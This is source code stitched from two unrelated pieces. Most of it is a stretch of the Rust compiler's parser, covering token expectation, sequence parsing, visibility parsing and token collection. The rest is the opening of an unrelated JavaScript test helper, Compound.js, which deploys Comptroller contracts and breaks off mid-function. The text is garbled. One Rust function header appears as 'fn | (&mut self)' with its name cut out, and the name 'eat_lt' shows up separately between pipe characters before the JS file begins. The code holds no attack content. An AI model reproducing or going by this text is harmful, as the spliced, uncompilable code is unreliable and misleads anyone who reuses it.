[TokenTree::token(token::Pound, sp), TokenTree::token(token::Not, sp), body]
.iter()
.cloned()
.collect::<TokenStream>()
} else {
[TokenTree::token(token::Pound, sp), body]
.iter()
.cloned()
.collect::<TokenStream>()
},
),
));
self.next()
}
}
#[derive(Clone, PartialEq)]
enum TokenType {
Token(TokenKind),
Keyword(Symbol),
Operator,
Lifetime,
Ident,
Path,
Type,
Const,
}
impl TokenType {
fn to_string(&self) -> String {
match *self {
TokenType::Token(ref t) => format!("`{}`", pprust::token_kind_to_string(t)),
TokenType::Keyword(kw) => format!("`{}`", kw),
TokenType::Operator => "an operator".to_string(),
TokenType::Lifetime => "lifetime".to_string(),
TokenType::Ident => "identifier".to_string(),
TokenType::Path => "path".to_string(),
TokenType::Type => "type".to_string(),
TokenType::Const => "const".to_string(),
}
}
}
#[derive(Copy, Clone, Debug)]
enum TokenExpectType {
Expect,
NoExpect,
}
/// A sequence separator.
struct SeqSep {
/// The separator token.
sep: Option<TokenKind>,
/// `true` if a trailing separator is allowed.
trailing_sep_allowed: bool,
}
impl SeqSep {
fn trailing_allowed(t: TokenKind) -> SeqSep {
SeqSep { sep: Some(t), trailing_sep_allowed: true }
}
fn none() -> SeqSep {
SeqSep { sep: None, trailing_sep_allowed: false }
}
}
pub enum FollowedByType {
Yes,
No,
}
fn token_descr_opt(token: &Token) -> Option<&'static str> {
Some(match token.kind {
_ if token.is_special_ident() => "reserved identifier",
_ if token.is_used_keyword() => "keyword",
_ if token.is_unused_keyword() => "reserved keyword",
token::DocComment(..) => "doc comment",
_ => return None,
})
}
pub(super) fn token_descr(token: &Token) -> String {
let token_str = pprust::token_to_string(token);
match token_descr_opt(token) {
Some(prefix) => format!("{} `{}`", prefix, token_str),
_ => format!("`{}`", token_str),
}
}
impl<'a> Parser<'a> {
pub fn new(
sess: &'a ParseSess,
tokens: TokenStream,
desugar_doc_comments: bool,
subparser_name: Option<&'static str>,
) -> Self {
let mut parser = Parser {
sess,
token: Token::dummy(),
prev_token: Token::dummy(),
restrictions: Restrictions::empty(),
expected_tokens: Vec::new(),
token_cursor: TokenCursor {
frame: TokenCursorFrame::new(DelimSpan::dummy(), token::NoDelim, &tokens),
stack: Vec::new(),
cur_token: None,
collecting: None,
},
desugar_doc_comments,
unmatched_angle_bracket_count: 0,
max_angle_bracket_count: 0,
unclosed_delims: Vec::new(),
last_unexpected_token_span: None,
last_type_ascription: None,
subparser_name,
};
// Make parser point to the first token.
parser.bump();
parser
}
fn next_tok(&mut self, fallback_span: Span) -> Token {
let mut next = if self.desugar_doc_comments {
self.token_cursor.next_desugared()
} else {
self.token_cursor.next()
};
if next.span.is_dummy() {
// Tweak the location for better diagnostics, but keep syntactic context intact.
next.span = fallback_span.with_ctxt(next.span.ctxt());
}
next
}
pub fn unexpected<T>(&mut self) -> PResult<'a, T> {
match self.expect_one_of(&[], &[]) {
Err(e) => Err(e),
// We can get `Ok(true)` from `recover_closing_delimiter`
// which is called in `expected_one_of_not_found`.
Ok(_) => FatalError.raise(),
}
}
/// Expects and consumes the token `t`. Signals an error if the next token is not `t`.
pub fn expect(&mut self, t: &TokenKind) -> PResult<'a, bool /* recovered */> {
if self.expected_tokens.is_empty() {
if self.token == *t {
self.bump();
Ok(false)
} else {
self.unexpected_try_recover(t)
}
} else {
self.expect_one_of(slice::from_ref(t), &[])
}
}
/// Expect next token to be edible or inedible token. If edible,
/// then consume it; if inedible, then return without consuming
/// anything. Signal a fatal error if next token is unexpected.
pub fn expect_one_of(
&mut self,
edible: &[TokenKind],
inedible: &[TokenKind],
) -> PResult<'a, bool /* recovered */> {
if edible.contains(&self.token.kind) {
self.bump();
Ok(false)
} else if inedible.contains(&self.token.kind) {
// leave it in the input
Ok(false)
} else if self.last_unexpected_token_span == Some(self.token.span) {
FatalError.raise();
} else {
self.expected_one_of_not_found(edible, inedible)
}
}
// Public for rustfmt usage.
pub fn parse_ident(&mut self) -> PResult<'a, Ident> {
self.parse_ident_common(true)
}
fn parse_ident_common(&mut self, recover: bool) -> PResult<'a, Ident> {
match self.token.ident() {
Some((ident, is_raw)) => {
if !is_raw && ident.is_reserved() {
let mut err = self.expected_ident_found();
if recover {
err.emit();
} else {
return Err(err);
}
}
self.bump();
Ok(ident)
}
_ => Err(match self.prev_token.kind {
TokenKind::DocComment(..) => {
self.span_fatal_err(self.prev_token.span, Error::UselessDocComment)
}
_ => self.expected_ident_found(),
}),
}
}
/// Checks if the next token is `tok`, and returns `true` if so.
///
/// This method will automatically add `tok` to `expected_tokens` if `tok` is not
/// encountered.
fn check(&mut self, tok: &TokenKind) -> bool {
let is_present = self.token == *tok;
if !is_present {
self.expected_tokens.push(TokenType::Token(tok.clone()));
}
is_present
}
/// Consumes a token 'tok' if it exists. Returns whether the given token was present.
pub fn eat(&mut self, tok: &TokenKind) -> bool {
let is_present = self.check(tok);
if is_present {
self.bump()
}
is_present
}
/// If the next token is the given keyword, returns `true` without eating it.
/// An expectation is also added for diagnostics purposes.
fn check_keyword(&mut self, kw: Symbol) -> bool {
self.expected_tokens.push(TokenType::Keyword(kw));
self.token.is_keyword(kw)
}
/// If the next token is the given keyword, eats it and returns `true`.
/// Otherwise, returns `false`. An expectation is also added for diagnostics purposes.
// Public for rustfmt usage.
pub fn eat_keyword(&mut self, kw: Symbol) -> bool {
if self.check_keyword(kw) {
self.bump();
true
} else {
false
}
}
fn eat_keyword_noexpect(&mut self, kw: Symbol) -> bool {
if self.token.is_keyword(kw) {
self.bump();
true
} else {
false
}
}
/// If the given word is not a keyword, signals an error.
/// If the next token is not the given word, signals an error.
/// Otherwise, eats it.
fn expect_keyword(&mut self, kw: Symbol) -> PResult<'a, ()> {
if !self.eat_keyword(kw) { self.unexpected() } else { Ok(()) }
}
/// Is the given keyword `kw` followed by a non-reserved identifier?
fn is_kw_followed_by_ident(&self, kw: Symbol) -> bool {
self.token.is_keyword(kw) && self.look_ahead(1, |t| t.is_ident() && !t.is_reserved_ident())
}
fn check_or_expected(&mut self, ok: bool, typ: TokenType) -> bool {
if ok {
true
} else {
self.expected_tokens.push(typ);
false
}
}
fn check_ident(&mut self) -> bool {
self.check_or_expected(self.token.is_ident(), TokenType::Ident)
}
fn check_path(&mut self) -> bool {
self.check_or_expected(self.token.is_path_start(), TokenType::Path)
}
fn check_type(&mut self) -> bool {
self.check_or_expected(self.token.can_begin_type(), TokenType::Type)
}
fn check_const_arg(&mut self) -> bool {
self.check_or_expected(self.token.can_begin_const_arg(), TokenType::Const)
}
fn check_inline_const(&mut self) -> bool {
self.check_keyword(kw::Const)
&& self.look_ahead(1, |t| t == &token::OpenDelim(DelimToken::Brace))
}
/// Checks to see if the next token is either `+` or `+=`.
/// Otherwise returns `false`.
fn check_plus(&mut self) -> bool {
self.check_or_expected(
self.token.is_like_plus(),
TokenType::Token(token::BinOp(token::Plus)),
)
}
/// Eats the expected token if it's present possibly breaking
/// compound tokens like multi-character operators in process.
/// Returns `true` if the token was eaten.
fn break_and_eat(&mut self, expected: TokenKind) -> bool {
if self.token.kind == expected {
self.bump();
return true;
}
match self.token.kind.break_two_token_op() {
Some((first, second)) if first == expected => {
let first_span = self.sess.source_map().start_point(self.token.span);
let second_span = self.token.span.with_lo(first_span.hi());
self.token = Token::new(first, first_span);
self.bump_with(Token::new(second, second_span));
true
}
_ => {
self.expected_tokens.push(TokenType::Token(expected));
false
}
}
}
/// Eats `+` possibly breaking tokens like `+=` in process.
fn eat_plus(&mut self) -> bool {
self.break_and_eat(token::BinOp(token::Plus))
}
/// Eats `&` possibly breaking tokens like `&&` in process.
/// Signals an error if `&` is not eaten.
fn expect_and(&mut self) -> PResult<'a, ()> {
if self.break_and_eat(token::BinOp(token::And)) { Ok(()) } else { self.unexpected() }
}
/// Eats `|` possibly breaking tokens like `||` in process.
/// Signals an error if `|` was not eaten.
fn expect_or(&mut self) -> PResult<'a, ()> {
if self.break_and_eat(token::BinOp(token::Or)) { Ok(()) } else { self.unexpected() }
}
/// Eats `<` possibly breaking tokens like `<<` in process.
fn | (&mut self) -> bool {
let ate = self.break_and_eat(token::Lt);
if ate {
// See doc comment for `unmatched_angle_bracket_count`.
self.unmatched_angle_bracket_count += 1;
self.max_angle_bracket_count += 1;
debug!("eat_lt: (increment) count={:?}", self.unmatched_angle_bracket_count);
}
ate
}
/// Eats `<` possibly breaking tokens like `<<` in process.
/// Signals an error if `<` was not eaten.
fn expect_lt(&mut self) -> PResult<'a, ()> {
if self.eat_lt() { Ok(()) } else { self.unexpected() }
}
/// Eats `>` possibly breaking tokens like `>>` in process.
/// Signals an error if `>` was not eaten.
fn expect_gt(&mut self) -> PResult<'a, ()> {
if self.break_and_eat(token::Gt) {
// See doc comment for `unmatched_angle_bracket_count`.
if self.unmatched_angle_bracket_count > 0 {
self.unmatched_angle_bracket_count -= 1;
debug!("expect_gt: (decrement) count={:?}", self.unmatched_angle_bracket_count);
}
Ok(())
} else {
self.unexpected()
}
}
fn expect_any_with_type(&mut self, kets: &[&TokenKind], expect: TokenExpectType) -> bool {
kets.iter().any(|k| match expect {
TokenExpectType::Expect => self.check(k),
TokenExpectType::NoExpect => self.token == **k,
})
}
fn parse_seq_to_before_tokens<T>(
&mut self,
kets: &[&TokenKind],
sep: SeqSep,
expect: TokenExpectType,
mut f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool /* trailing */, bool /* recovered */)> {
let mut first = true;
let mut recovered = false;
let mut trailing = false;
let mut v = vec![];
while !self.expect_any_with_type(kets, expect) {
if let token::CloseDelim(..) | token::Eof = self.token.kind {
break;
}
if let Some(ref t) = sep.sep {
if first {
first = false;
} else {
match self.expect(t) {
Ok(false) => {}
Ok(true) => {
recovered = true;
break;
}
Err(mut expect_err) => {
let sp = self.prev_token.span.shrink_to_hi();
let token_str = pprust::token_kind_to_string(t);
// Attempt to keep parsing if it was a similar separator.
if let Some(ref tokens) = t.similar_tokens() {
if tokens.contains(&self.token.kind) {
self.bump();
}
}
// If this was a missing `@` in a binding pattern
// bail with a suggestion
// https://github.com/rust-lang/rust/issues/72373
if self.prev_token.is_ident() && self.token.kind == token::DotDot {
let msg = format!(
"if you meant to bind the contents of \
the rest of the array pattern into `{}`, use `@`",
pprust::token_to_string(&self.prev_token)
);
expect_err
.span_suggestion_verbose(
self.prev_token.span.shrink_to_hi().until(self.token.span),
&msg,
" @ ".to_string(),
Applicability::MaybeIncorrect,
)
.emit();
break;
}
// Attempt to keep parsing if it was an omitted separator.
match f(self) {
Ok(t) => {
// Parsed successfully, therefore most probably the code only
// misses a separator.
let mut exp_span = self.sess.source_map().next_point(sp);
if self.sess.source_map().is_multiline(exp_span) {
exp_span = sp;
}
expect_err
.span_suggestion_short(
exp_span,
&format!("missing `{}`", token_str),
token_str,
Applicability::MaybeIncorrect,
)
.emit();
v.push(t);
continue;
}
Err(mut e) => {
// Parsing failed, therefore it must be something more serious
// than just a missing separator.
expect_err.emit();
e.cancel();
break;
}
}
}
}
}
}
if sep.trailing_sep_allowed && self.expect_any_with_type(kets, expect) {
trailing = true;
break;
}
let t = f(self)?;
v.push(t);
}
Ok((v, trailing, recovered))
}
/// Parses a sequence, not including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
fn parse_seq_to_before_end<T>(
&mut self,
ket: &TokenKind,
sep: SeqSep,
f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool, bool)> {
self.parse_seq_to_before_tokens(&[ket], sep, TokenExpectType::Expect, f)
}
/// Parses a sequence, including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
fn parse_seq_to_end<T>(
&mut self,
ket: &TokenKind,
sep: SeqSep,
f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool /* trailing */)> {
let (val, trailing, recovered) = self.parse_seq_to_before_end(ket, sep, f)?;
if !recovered {
self.eat(ket);
}
Ok((val, trailing))
}
/// Parses a sequence, including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
fn parse_unspanned_seq<T>(
&mut self,
bra: &TokenKind,
ket: &TokenKind,
sep: SeqSep,
f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool)> {
self.expect(bra)?;
self.parse_seq_to_end(ket, sep, f)
}
fn parse_delim_comma_seq<T>(
&mut self,
delim: DelimToken,
f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool)> {
self.parse_unspanned_seq(
&token::OpenDelim(delim),
&token::CloseDelim(delim),
SeqSep::trailing_allowed(token::Comma),
f,
)
}
fn parse_paren_comma_seq<T>(
&mut self,
f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool)> {
self.parse_delim_comma_seq(token::Paren, f)
}
/// Advance the parser by one token using provided token as the next one.
fn bump_with(&mut self, next_token: Token) {
// Bumping after EOF is a bad sign, usually an infinite loop.
if self.prev_token.kind == TokenKind::Eof {
let msg = "attempted to bump the parser past EOF (may be stuck in a loop)";
self.span_bug(self.token.span, msg);
}
// Update the current and previous tokens.
self.prev_token = mem::replace(&mut self.token, next_token);
// Diagnostics.
self.expected_tokens.clear();
}
/// Advance the parser by one token.
pub fn bump(&mut self) {
let next_token = self.next_tok(self.token.span);
self.bump_with(next_token);
}
/// Look-ahead `dist` tokens of `self.token` and get access to that token there.
/// When `dist == 0` then the current token is looked at.
pub fn look_ahead<R>(&self, dist: usize, looker: impl FnOnce(&Token) -> R) -> R {
if dist == 0 {
return looker(&self.token);
}
let frame = &self.token_cursor.frame;
looker(&match frame.tree_cursor.look_ahead(dist - 1) {
Some(tree) => match tree {
TokenTree::Token(token) => token,
TokenTree::Delimited(dspan, delim, _) => {
Token::new(token::OpenDelim(delim), dspan.open)
}
},
None => Token::new(token::CloseDelim(frame.delim), frame.span.close),
})
}
/// Returns whether any of the given keywords are `dist` tokens ahead of the current one.
fn is_keyword_ahead(&self, dist: usize, kws: &[Symbol]) -> bool {
self.look_ahead(dist, |t| kws.iter().any(|&kw| t.is_keyword(kw)))
}
/// Parses asyncness: `async` or nothing.
fn parse_asyncness(&mut self) -> Async {
if self.eat_keyword(kw::Async) {
let span = self.prev_token.uninterpolated_span();
Async::Yes { span, closure_id: DUMMY_NODE_ID, return_impl_trait_id: DUMMY_NODE_ID }
} else {
Async::No
}
}
/// Parses unsafety: `unsafe` or nothing.
fn parse_unsafety(&mut self) -> Unsafe {
if self.eat_keyword(kw::Unsafe) {
Unsafe::Yes(self.prev_token.uninterpolated_span())
} else {
Unsafe::No
}
}
/// Parses constness: `const` or nothing.
fn parse_constness(&mut self) -> Const {
// Avoid const blocks to be parsed as const items
if self.look_ahead(1, |t| t != &token::OpenDelim(DelimToken::Brace))
&& self.eat_keyword(kw::Const)
{
Const::Yes(self.prev_token.uninterpolated_span())
} else {
Const::No
}
}
/// Parses inline const expressions.
fn parse_const_expr(&mut self, span: Span) -> PResult<'a, P<Expr>> {
self.sess.gated_spans.gate(sym::inline_const, span);
self.eat_keyword(kw::Const);
let blk = self.parse_block()?;
let anon_const = AnonConst {
id: DUMMY_NODE_ID,
value: self.mk_expr(blk.span, ExprKind::Block(blk, None), AttrVec::new()),
};
Ok(self.mk_expr(span, ExprKind::ConstBlock(anon_const), AttrVec::new()))
}
/// Parses mutability (`mut` or nothing).
fn parse_mutability(&mut self) -> Mutability {
if self.eat_keyword(kw::Mut) { Mutability::Mut } else { Mutability::Not }
}
/// Possibly parses mutability (`const` or `mut`).
fn parse_const_or_mut(&mut self) -> Option<Mutability> {
if self.eat_keyword(kw::Mut) {
Some(Mutability::Mut)
} else if self.eat_keyword(kw::Const) {
Some(Mutability::Not)
} else {
None
}
}
fn parse_field_name(&mut self) -> PResult<'a, Ident> {
if let token::Literal(token::Lit { kind: token::Integer, symbol, suffix }) = self.token.kind
{
self.expect_no_suffix(self.token.span, "a tuple index", suffix);
self.bump();
Ok(Ident::new(symbol, self.prev_token.span))
} else {
self.parse_ident_common(false)
}
}
fn parse_mac_args(&mut self) -> PResult<'a, P<MacArgs>> {
self.parse_mac_args_common(true).map(P)
}
fn parse_attr_args(&mut self) -> PResult<'a, MacArgs> {
self.parse_mac_args_common(false)
}
fn parse_mac_args_common(&mut self, delimited_only: bool) -> PResult<'a, MacArgs> {
Ok(
if self.check(&token::OpenDelim(DelimToken::Paren))
|| self.check(&token::OpenDelim(DelimToken::Bracket))
|| self.check(&token::OpenDelim(DelimToken::Brace))
{
match self.parse_token_tree() {
TokenTree::Delimited(dspan, delim, tokens) =>
// We've confirmed above that there is a delimiter so unwrapping is OK.
{
MacArgs::Delimited(dspan, MacDelimiter::from_token(delim).unwrap(), tokens)
}
_ => unreachable!(),
}
} else if !delimited_only {
if self.eat(&token::Eq) {
let eq_span = self.prev_token.span;
let mut is_interpolated_expr = false;
if let token::Interpolated(nt) = &self.token.kind {
if let token::NtExpr(..) = **nt {
is_interpolated_expr = true;
}
}
let token_tree = if is_interpolated_expr {
// We need to accept arbitrary interpolated expressions to continue
// supporting things like `doc = $expr` that work on stable.
// Non-literal interpolated expressions are rejected after expansion.
self.parse_token_tree()
} else {
self.parse_unsuffixed_lit()?.token_tree()
};
MacArgs::Eq(eq_span, token_tree.into())
} else {
MacArgs::Empty
}
} else {
return self.unexpected();
},
)
}
fn parse_or_use_outer_attributes(
&mut self,
already_parsed_attrs: Option<AttrVec>,
) -> PResult<'a, AttrVec> {
if let Some(attrs) = already_parsed_attrs {
Ok(attrs)
} else {
self.parse_outer_attributes().map(|a| a.into())
}
}
/// Parses a single token tree from the input.
pub(crate) fn parse_token_tree(&mut self) -> TokenTree {
match self.token.kind {
token::OpenDelim(..) => {
let frame = mem::replace(
&mut self.token_cursor.frame,
self.token_cursor.stack.pop().unwrap(),
);
self.token = Token::new(TokenKind::CloseDelim(frame.delim), frame.span.close);
self.bump();
TokenTree::Delimited(frame.span, frame.delim, frame.tree_cursor.stream)
}
token::CloseDelim(_) | token::Eof => unreachable!(),
_ => {
self.bump();
TokenTree::Token(self.prev_token.clone())
}
}
}
/// Parses a stream of tokens into a list of `TokenTree`s, up to EOF.
pub fn parse_all_token_trees(&mut self) -> PResult<'a, Vec<TokenTree>> {
let mut tts = Vec::new();
while self.token != token::Eof {
tts.push(self.parse_token_tree());
}
Ok(tts)
}
pub fn parse_tokens(&mut self) -> TokenStream {
let mut result = Vec::new();
loop {
match self.token.kind {
token::Eof | token::CloseDelim(..) => break,
_ => result.push(self.parse_token_tree().into()),
}
}
TokenStream::new(result)
}
/// Evaluates the closure with restrictions in place.
///
/// Afters the closure is evaluated, restrictions are reset.
fn with_res<T>(&mut self, res: Restrictions, f: impl FnOnce(&mut Self) -> T) -> T {
let old = self.restrictions;
self.restrictions = res;
let res = f(self);
self.restrictions = old;
res
}
fn is_crate_vis(&self) -> bool {
self.token.is_keyword(kw::Crate) && self.look_ahead(1, |t| t != &token::ModSep)
}
/// Parses `pub`, `pub(crate)` and `pub(in path)` plus shortcuts `crate` for `pub(crate)`,
/// `pub(self)` for `pub(in self)` and `pub(super)` for `pub(in super)`.
/// If the following element can't be a tuple (i.e., it's a function definition), then
/// it's not a tuple struct field), and the contents within the parentheses isn't valid,
/// so emit a proper diagnostic.
// Public for rustfmt usage.
pub fn parse_visibility(&mut self, fbt: FollowedByType) -> PResult<'a, Visibility> {
maybe_whole!(self, NtVis, |x| x);
self.expected_tokens.push(TokenType::Keyword(kw::Crate));
if self.is_crate_vis() {
self.bump(); // `crate`
self.sess.gated_spans.gate(sym::crate_visibility_modifier, self.prev_token.span);
return Ok(Visibility {
span: self.prev_token.span,
kind: VisibilityKind::Crate(CrateSugar::JustCrate),
tokens: None,
});
}
if !self.eat_keyword(kw::Pub) {
// We need a span for our `Spanned<VisibilityKind>`, but there's inherently no
// keyword to grab a span from for inherited visibility; an empty span at the
// beginning of the current token would seem to be the "Schelling span".
return Ok(Visibility {
span: self.token.span.shrink_to_lo(),
kind: VisibilityKind::Inherited,
tokens: None,
});
}
let lo = self.prev_token.span;
if self.check(&token::OpenDelim(token::Paren)) {
// We don't `self.bump()` the `(` yet because this might be a struct definition where
// `()` or a tuple might be allowed. For example, `struct Struct(pub (), pub (usize));`.
// Because of this, we only `bump` the `(` if we're assured it is appropriate to do so
// by the following tokens.
if self.is_keyword_ahead(1, &[kw::Crate]) && self.look_ahead(2, |t| t != &token::ModSep)
// account for `pub(crate::foo)`
{
// Parse `pub(crate)`.
self.bump(); // `(`
self.bump(); // `crate`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = VisibilityKind::Crate(CrateSugar::PubCrate);
return Ok(Visibility {
span: lo.to(self.prev_token.span),
kind: vis,
tokens: None,
});
} else if self.is_keyword_ahead(1, &[kw::In]) {
// Parse `pub(in path)`.
self.bump(); // `(`
self.bump(); // `in`
let path = self.parse_path(PathStyle::Mod)?; // `path`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = VisibilityKind::Restricted { path: P(path), id: ast::DUMMY_NODE_ID };
return Ok(Visibility {
span: lo.to(self.prev_token.span),
kind: vis,
tokens: None,
});
} else if self.look_ahead(2, |t| t == &token::CloseDelim(token::Paren))
&& self.is_keyword_ahead(1, &[kw::Super, kw::SelfLower])
{
// Parse `pub(self)` or `pub(super)`.
self.bump(); // `(`
let path = self.parse_path(PathStyle::Mod)?; // `super`/`self`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = VisibilityKind::Restricted { path: P(path), id: ast::DUMMY_NODE_ID };
return Ok(Visibility {
span: lo.to(self.prev_token.span),
kind: vis,
tokens: None,
});
} else if let FollowedByType::No = fbt {
// Provide this diagnostic if a type cannot follow;
// in particular, if this is not a tuple struct.
self.recover_incorrect_vis_restriction()?;
// Emit diagnostic, but continue with public visibility.
}
}
Ok(Visibility { span: lo, kind: VisibilityKind::Public, tokens: None })
}
/// Recovery for e.g. `pub(something) fn ...` or `struct X { pub(something) y: Z }`
fn recover_incorrect_vis_restriction(&mut self) -> PResult<'a, ()> {
self.bump(); // `(`
let path = self.parse_path(PathStyle::Mod)?;
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let msg = "incorrect visibility restriction";
let suggestion = r##"some possible visibility restrictions are:
`pub(crate)`: visible only on the current crate
`pub(super)`: visible only in the current module's parent
`pub(in path::to::module)`: visible only on the specified path"##;
let path_str = pprust::path_to_string(&path);
struct_span_err!(self.sess.span_diagnostic, path.span, E0704, "{}", msg)
.help(suggestion)
.span_suggestion(
path.span,
&format!("make this visible only to module `{}` with `in`", path_str),
format!("in {}", path_str),
Applicability::MachineApplicable,
)
.emit();
Ok(())
}
/// Parses `extern string_literal?`.
fn parse_extern(&mut self) -> PResult<'a, Extern> {
Ok(if self.eat_keyword(kw::Extern) {
Extern::from_abi(self.parse_abi())
} else {
Extern::None
})
}
/// Parses a string literal as an ABI spec.
fn parse_abi(&mut self) -> Option<StrLit> {
match self.parse_str_lit() {
Ok(str_lit) => Some(str_lit),
Err(Some(lit)) => match lit.kind {
ast::LitKind::Err(_) => None,
_ => {
self.struct_span_err(lit.span, "non-string ABI literal")
.span_suggestion(
lit.span,
"specify the ABI with a string literal",
"\"C\"".to_string(),
Applicability::MaybeIncorrect,
)
.emit();
None
}
},
Err(None) => None,
}
}
/// Records all tokens consumed by the provided callback,
/// including the current token. These tokens are collected
/// into a `TokenStream`, and returned along with the result
/// of the callback.
///
/// Note: If your callback consumes an opening delimiter
/// (including the case where you call `collect_tokens`
/// when the current token is an opening delimeter),
/// you must also consume the corresponding closing delimiter.
///
/// That is, you can consume
/// `something ([{ }])` or `([{}])`, but not `([{}]`
///
/// This restriction shouldn't be an issue in practice,
/// since this function is used to record the tokens for
/// a parsed AST item, which always has matching delimiters.
pub fn collect_tokens<R>(
&mut self,
f: impl FnOnce(&mut Self) -> PResult<'a, R>,
) -> PResult<'a, (R, TokenStream)> {
// Record all tokens we parse when parsing this item.
let tokens: Vec<TreeAndSpacing> = self.token_cursor.cur_token.clone().into_iter().collect();
debug!("collect_tokens: starting with {:?}", tokens);
// We need special handling for the case where `collect_tokens` is called
// on an opening delimeter (e.g. '('). At this point, we have already pushed
// a new frame - however, we want to record the original `TokenTree::Delimited`,
// for consistency with the case where we start recording one token earlier.
// See `TokenCursor::next` to see how `cur_token` is set up.
let prev_depth =
if matches!(self.token_cursor.cur_token, Some((TokenTree::Delimited(..), _))) {
if self.token_cursor.stack.is_empty() {
// There is nothing below us in the stack that
// the function could consume, so the only thing it can legally
// capture is the entire contents of the current frame.
return Ok((f(self)?, TokenStream::new(tokens)));
}
// We have already recorded the full `TokenTree::Delimited` when we created
// our `tokens` vector at the start of this function. We are now inside
// a new frame corresponding to the `TokenTree::Delimited` we already recoreded.
// We don't want to record any of the tokens inside this frame, since they
// will be duplicates of the tokens nested inside the `TokenTree::Delimited`.
// Therefore, we set our recording depth to the *previous* frame. This allows
// us to record a sequence like: `(foo).bar()`: the `(foo)` will be recored
// as our initial `cur_token`, while the `.bar()` will be recored after we
// pop the `(foo)` frame.
self.token_cursor.stack.len() - 1
} else {
self.token_cursor.stack.len()
};
let prev_collecting =
self.token_cursor.collecting.replace(Collecting { buf: tokens, depth: prev_depth });
let ret = f(self);
let mut collected_tokens = if let Some(collecting) = self.token_cursor.collecting.take() {
collecting.buf
} else {
let msg = "our vector went away?";
debug!("collect_tokens: {}", msg);
self.sess.span_diagnostic.delay_span_bug(self.token.span, &msg);
// This can happen due to a bad interaction of two unrelated recovery mechanisms
// with mismatched delimiters *and* recovery lookahead on the likely typo
// `pub ident(` (#62895, different but similar to the case above).
return Ok((ret?, TokenStream::default()));
};
debug!("collect_tokens: got raw tokens {:?}", collected_tokens);
// If we're not at EOF our current token wasn't actually consumed by
// `f`, but it'll still be in our list that we pulled out. In that case
// put it back.
let extra_token = if self.token != token::Eof { collected_tokens.pop() } else { None };
if let Some(mut collecting) = prev_collecting {
// If we were previously collecting at the same depth,
// then the previous call to `collect_tokens` needs to see
// the tokens we just recorded.
//
// If we were previously recording at an lower `depth`,
// then the previous `collect_tokens` call already recorded
// this entire frame in the form of a `TokenTree::Delimited`,
// so there is nothing else for us to do.
if collecting.depth == prev_depth {
collecting.buf.extend(collected_tokens.iter().cloned());
collecting.buf.extend(extra_token);
debug!("collect_tokens: updating previous buf to {:?}", collecting);
}
self.token_cursor.collecting = Some(collecting)
}
Ok((ret?, TokenStream::new(collected_tokens)))
}
/// `::{` or `::*`
fn is_import_coupler(&mut self) -> bool {
self.check(&token::ModSep)
&& self.look_ahead(1, |t| {
*t == token::OpenDelim(token::Brace) || *t == token::BinOp(token::Star)
})
}
pub fn clear_expected_tokens(&mut self) {
self.expected_tokens.clear();
}
}
crate fn make_unclosed_delims_error(
unmatched: UnmatchedBrace,
sess: &ParseSess,
) -> Option<DiagnosticBuilder<'_>> {
// `None` here means an `Eof` was found. We already emit those errors elsewhere, we add them to
// `unmatched_braces` only for error recovery in the `Parser`.
let found_delim = unmatched.found_delim?;
let mut err = sess.span_diagnostic.struct_span_err(
unmatched.found_span,
&format!(
"mismatched closing delimiter: `{}`",
pprust::token_kind_to_string(&token::CloseDelim(found_delim)),
),
);
err.span_label(unmatched.found_span, "mismatched closing delimiter");
if let Some(sp) = unmatched.candidate_span {
err.span_label(sp, "closing delimiter possibly meant for this");
}
if let Some(sp) = unmatched.unclosed_span {
err.span_label(sp, "unclosed delimiter");
}
Some(err)
}
pub fn emit_unclosed_delims(unclosed_delims: &mut Vec<UnmatchedBrace>, sess: &ParseSess) {
*sess.reached_eof.borrow_mut() |=
unclosed_delims.iter().any(|unmatched_delim| unmatched_delim.found_delim.is_none());
for unmatched in unclosed_delims.drain(..) {
if let Some(mut e) = make_unclosed_delims_error(unmatched, sess) {
e.emit();
}
}
}
| eat_lt |
Compound.js | "use strict";
const { dfn } = require('./JS');
const {
encodeParameters,
etherBalance,
etherMantissa,
etherUnsigned,
mergeInterface
} = require('./Ethereum');
async function makeComptroller(opts = {}) {
const {
root = saddle.account,
kind = 'unitroller'
} = opts || {};
if (kind == 'bool') {
return await deploy('BoolComptroller');
}
if (kind == 'false-marker') {
return await deploy('FalseMarkerMethodComptroller');
}
if (kind == 'v1-no-proxy') {
const comptroller = await deploy('ComptrollerHarness');
const priceOracle = opts.priceOracle || await makePriceOracle(opts.priceOracleOpts);
const closeFactor = etherMantissa(dfn(opts.closeFactor, .051));
const maxAssets = etherUnsigned(dfn(opts.maxAssets, 10));
await send(comptroller, '_setCloseFactor', [closeFactor]);
await send(comptroller, '_setMaxAssets', [maxAssets]);
await send(comptroller, '_setPriceOracle', [priceOracle._address]);
return Object.assign(comptroller, { priceOracle });
}
if (kind == 'unitroller-prior') {
const unitroller = opts.unitroller || await deploy('Unitroller');
const comptroller = await deploy('ComptrollerG2');
const priceOracle = opts.priceOracle || await makePriceOracle(opts.priceOracleOpts);
const closeFactor = etherMantissa(dfn(opts.closeFactor, .051));
const maxAssets = etherUnsigned(dfn(opts.maxAssets, 10));
const liquidationIncentive = etherMantissa(1);
await send(unitroller, '_setPendingImplementation', [comptroller._address]);
await send(comptroller, '_become', [unitroller._address]);
mergeInterface(unitroller, comptroller);
await send(unitroller, '_setLiquidationIncentive', [liquidationIncentive]);
await send(unitroller, '_setCloseFactor', [closeFactor]);
await send(unitroller, '_setMaxAssets', [maxAssets]);
await send(unitroller, '_setPriceOracle', [priceOracle._address]);
return Object.assign(unitroller, { priceOracle });
}
if (kind == 'unitroller') {
const unitroller = opts.unitroller || await deploy('Unitroller');
const comptroller = await deploy('ComptrollerHarness');
